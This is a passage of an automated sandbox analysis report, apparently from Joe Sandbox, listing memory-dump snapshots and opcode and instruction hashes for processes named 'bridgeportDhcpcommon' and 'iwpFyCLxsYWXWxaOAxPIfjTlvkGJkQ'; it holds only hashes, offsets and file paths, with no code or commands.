                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: BFC08C3051180C8FCA08EB38C88480433A0FF09200BC20190E008C7170E269DCC0CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9baf3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                                                                  • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75f04f4e10fb1435e48ba457373a2a427681c093318a59d606c27cf828323c13
                                                                                                                                  • Instruction ID: 39fc998ffddd9ef3abd32b151f94c01f7a66bf73b2bea845c0c97191da68344d
                                                                                                                                  • Opcode Fuzzy Hash: 75f04f4e10fb1435e48ba457373a2a427681c093318a59d606c27cf828323c13
                                                                                                                                  • Instruction Fuzzy Hash: 78D0C920B0F65F89F6786681413223A55E96F50301E62043DD0AF528E1CE1FBB017202
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: da4f19d416c816b19f514779fc6b4093f8e0602b71c486fe1494f81a2bf26567
                                                                                                                                  • Instruction ID: e74c243e36d20b7c82c6d665e01e4a772718f162063b66212e37b1e577a75ce1
                                                                                                                                  • Opcode Fuzzy Hash: da4f19d416c816b19f514779fc6b4093f8e0602b71c486fe1494f81a2bf26567
                                                                                                                                  • Instruction Fuzzy Hash: 05D0C910B0F64F86F6B866818130A796AAD6F40B41E22403DC09F818E7CE2F7F816602
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 16883b97644782af2b089d18615e4f38e14ce91fd4c50fc0c7f12eda0d553bff
                                                                                                                                  • Instruction ID: 1b85bf91ca82663dff7e2d29131b0e0fbdb3c82ee7176ee4cf00eeaae4fce785
                                                                                                                                  • Opcode Fuzzy Hash: 16883b97644782af2b089d18615e4f38e14ce91fd4c50fc0c7f12eda0d553bff
                                                                                                                                  • Instruction Fuzzy Hash: 93C04C41F5DC6A16F25966144535A7D04525F9471CFD50574F51EC72CECE5C5A0202C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 60234b9b636d17408fdcf6905c06c91aae6a8ef38007e699dd38842bf1be9314
                                                                                                                                  • Instruction ID: d4463e982756597f202ec84f89f28d0f15e0fcbb0d403f0c4896e463b1907afa
                                                                                                                                  • Opcode Fuzzy Hash: 60234b9b636d17408fdcf6905c06c91aae6a8ef38007e699dd38842bf1be9314
                                                                                                                                  • Instruction Fuzzy Hash: 02C08C30A0F20B8FF3396390803223637A5BF41300F2244B9C44E4B4F2CE2A7B01A311
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ff241fe3d1445e0c9a235275b143493ed76da9adaf01aed60a49a3c6d8f9f3ff
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 7EB01204D5740F00E87433FA086606870509BC4100FC20270D40C8019198CD12941246
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec5406fdf242c389546c0ed808d4c9b145bffe21bbf618e28a2337c7eb5babfa
                                                                                                                                  • Instruction ID: a2170cc50df61504445d0b6d85948c53a01b8a3eac6f04a5e13579b98672bebd
                                                                                                                                  • Opcode Fuzzy Hash: ec5406fdf242c389546c0ed808d4c9b145bffe21bbf618e28a2337c7eb5babfa
                                                                                                                                  • Instruction Fuzzy Hash: D9C04C41F1F24696E63121F404A207D06951B162057560571E1064A1E3D84D6A055665
                                                                                                                                  Memory Dump Source
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0425d0f0f1b42c664721b94fd53aa99bec4ad442ca8ed5007358c53a84087f52
                                                                                                                                  • Instruction ID: e58bccd1bcd445bdd39151f8412dd83e62605d7f7bacb4052aab5bd7342df64a
                                                                                                                                  • Opcode Fuzzy Hash: 0425d0f0f1b42c664721b94fd53aa99bec4ad442ca8ed5007358c53a84087f52
                                                                                                                                  • Instruction Fuzzy Hash: F821C520B1995D0FF798FB6C94AA67972C3EB99326F4100BEE40DC32E7DD54AC418295
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction ID: dfbcc0dc2d70896cd87b121984961216c8990e403d431e32b97dc875d70e4324
                                                                                                                                  • Opcode Fuzzy Hash: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction Fuzzy Hash: 8901D62AB0E5550AD324B27C7CA68E53B50CFA523F70803F7E24DCE5A7DC08904A87D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction ID: 2fd90356b865a35136ea2973926417c0e99dfe7ab35acf3027c41e9a90ee891d
                                                                                                                                  • Opcode Fuzzy Hash: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction Fuzzy Hash: 8611A136A0E28D8FE722DFA888601DD7FB1EF42711F0645F7D048DB1A2D97466498764
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 454759c922b5750dedd24c32d90a362be9c0e18f41f3d39b972633ba9dd446f0
                                                                                                                                  • Instruction ID: a864755d09d803635b32d39b870abf3a29a46250a0e9860f2b88b4790fe8ec02
                                                                                                                                  • Opcode Fuzzy Hash: 454759c922b5750dedd24c32d90a362be9c0e18f41f3d39b972633ba9dd446f0
                                                                                                                                  • Instruction Fuzzy Hash: 96015232F0542E4AEFA4D79898643FD73E1EFE8311F064A76E009D7195DA68AA414780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction ID: 29b7ff40235aed8ed58873bd8658f74a1c50275defc08408daf90b1810143e1e
                                                                                                                                  • Opcode Fuzzy Hash: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction Fuzzy Hash: B4019235A0E38D9FE721DFA4C85049CBFB1EF02710F1641E7D048DB1A2D9746645C754
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction ID: 3cddbe00afb4ff431c128674d65695716683e5987107ee65f5c6ba0062407818
                                                                                                                                  • Opcode Fuzzy Hash: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction Fuzzy Hash: 4201BC31A0E38D9FEB21DFA488A049CBFB1AF02700F1542E7D048CB2A3D9786A448754
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction ID: a062485ef70691557f72edf6e6b1847a2b5b20afc9384f58c100db5ba6bdc7be
                                                                                                                                  • Opcode Fuzzy Hash: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction Fuzzy Hash: 7DF0342260E7C50FD31B173888754943FB0DE6316134A01E7C081CF1B3D85D888A8352
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction ID: aad96e1d7d97b683b76d1842787eed33bcf2f0f51b8489067d4b27900bf4e650
                                                                                                                                  • Opcode Fuzzy Hash: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction Fuzzy Hash: 88F0A03925EA49CFC742EB3DC8A58C4BB60FF02204B8A01FAD089CB5A2D3155C5ECB51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction ID: 5e7126f05cbdf4881c45ee340200cc1299084b3014dcb6f040ca477b80de1229
                                                                                                                                  • Opcode Fuzzy Hash: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction Fuzzy Hash: 6BF0E521B1DBC80FC769962D5866161BFF1DB9B20134A02EFC186CB6A3DD59AC898341
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 64a9c3bbb7f5388cf057e61f598ada5696dc9b997acc4e82ba8b3ca637a6e828
                                                                                                                                  • Instruction ID: 17befed0cbf27ab3611e07ed740970dfdafd5549d16128917ab4b55b2371d5a9
                                                                                                                                  • Opcode Fuzzy Hash: 64a9c3bbb7f5388cf057e61f598ada5696dc9b997acc4e82ba8b3ca637a6e828
                                                                                                                                  • Instruction Fuzzy Hash: 8DF0396161E3C44FD3139B3888254647FA0EA2720535B05FFD0CACB5B3D91A888AC312
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f1dd106be1675b28366ec2004843c401d7150df9e67d420f988a9a43e725198e
                                                                                                                                  • Instruction ID: f35ba541a3b941cc13c9aaf341ebe6c6db9b7f5f07bdd7303d4c571ca020273c
                                                                                                                                  • Opcode Fuzzy Hash: f1dd106be1675b28366ec2004843c401d7150df9e67d420f988a9a43e725198e
                                                                                                                                  • Instruction Fuzzy Hash: 14E06D6160E3C48FCB1AAB34886D8547F60EE6720134A42EFC486CF1A7EA2D8885C712
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bdd82aecfe198bbd8299d29e473943b755042969cf24d6653dde3fc191fa275e
                                                                                                                                  • Instruction ID: e977cd1362a9d23ade79f9f437f1636cba2e7f455eba951d8196d6cc27200e2a
                                                                                                                                  • Opcode Fuzzy Hash: bdd82aecfe198bbd8299d29e473943b755042969cf24d6653dde3fc191fa275e
                                                                                                                                  • Instruction Fuzzy Hash: 30E0927060E3C44FC71AEB3488688547F60EF6B20134A42EFC045CF2A7EA2DC885C701
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                                                                  • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f7a3b901470a638a08146a028bd1359cdd7a4822b67a7325f6711743c4a01083
                                                                                                                                  • Instruction ID: 880ba756eb9af5ae29679388ebbb4a3ffe5d4315ad9efc70ba0d3d57ab9991e9
                                                                                                                                  • Opcode Fuzzy Hash: f7a3b901470a638a08146a028bd1359cdd7a4822b67a7325f6711743c4a01083
                                                                                                                                  • Instruction Fuzzy Hash: 09C08C01F0C81A12F31922040421ABD04424F4471CF880034F00EC72CECE1C5A0202C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ed2ad82ac794e93c54508d1dd081e88639fcab4bd9146968243794078dba2c1c
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01200D5740F00E47433FA08A206870415B44200FC20070D40C8019198CE22980277
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction ID: e3ef123d9a2e456fd85f6baed8a656f05d0499f799ba2a21d6a2caedea0dda8f
                                                                                                                                  • Opcode Fuzzy Hash: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction Fuzzy Hash: E4B09224A0911A8BE7209B8084303AA22429B44310F224431A82D832DBDBA8A90086A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e577be885b508604c0e047c8af13a4fa4029d636a46edf93d7caaa7513130d0c
                                                                                                                                  • Instruction ID: 5da38debcb41220b8919076ac637b981868e020c68795386bdf360006042a7ef
                                                                                                                                  • Opcode Fuzzy Hash: e577be885b508604c0e047c8af13a4fa4029d636a46edf93d7caaa7513130d0c
                                                                                                                                  • Instruction Fuzzy Hash: 53918271A19A8E4FD798DB6888757A97FE1FF99314F40027EE059EB2D6CBB81401C740
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Opcode ID: 64ff31ec06f725775a5d2fd6173b8c9ac953bee29ac4c996ee5a9d43c924c097
                                                                                                                                  • Instruction ID: c8b2876f24e66c58ff6c243e4cc2f73b8dee7b4830f7dfc600d1b3de266f8ca2
                                                                                                                                  • Opcode Fuzzy Hash: 64ff31ec06f725775a5d2fd6173b8c9ac953bee29ac4c996ee5a9d43c924c097
                                                                                                                                  • Instruction Fuzzy Hash: 1001263632A95A8FC702AB7DE8914E8BB50EA83132BD602FBD044CB1A1E311185EC7D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 392507325debd9933642d29706e6cee57b8ef3f39f9044ef68c86df4ed2b8ae9
                                                                                                                                  • Instruction ID: 9d271665fb80e9df0629dd7bba1400346f8683c6df1e2b9aacee2ea38f509a4d
                                                                                                                                  • Opcode Fuzzy Hash: 392507325debd9933642d29706e6cee57b8ef3f39f9044ef68c86df4ed2b8ae9
                                                                                                                                  • Instruction Fuzzy Hash: 78412B21B0C9190AE315F7AC64A66F97781DF9833AB4442BBE40ECB1EBDD185841C285
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1351c527c6bbf3a3301abab4a072a968eda75cd8f770339bdc104fd130b93b92
                                                                                                                                  • Instruction ID: febb75f8d380d8f44648f87521ba6680a914faf478956cdde5aad8eb02bad41d
                                                                                                                                  • Opcode Fuzzy Hash: 1351c527c6bbf3a3301abab4a072a968eda75cd8f770339bdc104fd130b93b92
                                                                                                                                  • Instruction Fuzzy Hash: F7314732B0E2498EE332EBA898751EC3B70EF92325F4542B7D0588A1E3D9782645C785
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0b4c53e263431580ff756790bcd6a7350b59d00c51635d8202f3020a5bb2b585
                                                                                                                                  • Instruction ID: 28c8794b84b28f8a9b13c081b5b0435c3301d62d44eb13cd6392cd6569b3329b
